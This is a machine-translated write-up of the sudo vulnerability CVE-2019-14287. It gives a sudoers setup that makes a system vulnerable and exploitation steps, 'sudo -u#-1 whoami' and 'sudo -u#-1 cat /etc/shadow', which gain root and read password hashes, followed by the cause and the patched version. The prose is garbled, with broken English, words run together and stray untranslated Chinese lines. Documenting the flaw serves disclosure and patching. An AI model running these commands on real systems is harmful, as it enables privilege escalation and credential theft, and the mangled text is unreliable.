October 14, 2019, sudo in official issued a vulnerability alert CVE-2019-14287 is.
About 0x00
sudo all unix operating system (BSD, MacOS, GNU / Linux) a substantially integrated user access control / switching program. It allows administrators to control user permissions at the server the user can be switched.
0x01 Vulnerability Overview
The vulnerability is a sudo to bypass security policy issues, can lead to a malicious program or user to execute arbitrary commands as root on the target Linux system. Personally feel that the vulnerability relatively tasteless, because of the need to trigger special configuration, and there will be no security problems in the default Linux.
0x02 Affects Version
Sudo versions <1.8.28
0x03 environment to build
Any version <1.8.28 on linux machine can be obtained by the implementation of sudo -V
Use environment for sudo 1.8.16
Since the specific configuration is required, so the sudoers first modify the configuration file (file location / etc / sudoers)
In the root ALL = (ALL: ALL) ALL line adding the following configuration:
test ALL=(ALL,!root) ALL
1.其中的test表示用户名
2.第一个ALL表示允许该用户在任意机器或者终端中使用sudo
3.括号里面的(ALL,!root)表示命令可以被除了root以外的任意用户身份去执行
4.最后一个ALL表示被允许执行Add this line configuration means that: test the user can use the sudo command to any identity except the root to execute the command.
0x04 exploits
1. First, the user switches to the test:
su test
2. execution sudo whoamifailed
3. Performsudo -u#id whoami
Id here can go to trial any id, I /etc/grouppicked a test in itself id: 1001
Executed sudo -u#1001 whoamisuccessfully
Executed sudo -u#-1 whoamisuccessfully
4. Try to high-level operations
execution cat /etc/shadowfails
to perform sudo -u#-1 cat /etc/shadowsuccessfully
5. Explanation:
using sudo -u#idthe specified user id to execute the command, since the specified id, it is possible to use -u#-1or -u#4294967295to bypass restrictions, thereby to execute arbitrary code as root: this is because sudo command itself is already running in the user ID is 0, so when attempting to modify the user ID sudo to -1, any change does not occur. This results in the log entry sudo command reports the user ID of 4294967295 is not root (or the user ID 0) to run the command.
0x05 restorations
Sudo 1.8.28 update to version
0x06 Reference Links
Linux Sudo traced to vulnerabilities that can lead users to run commands with root privileges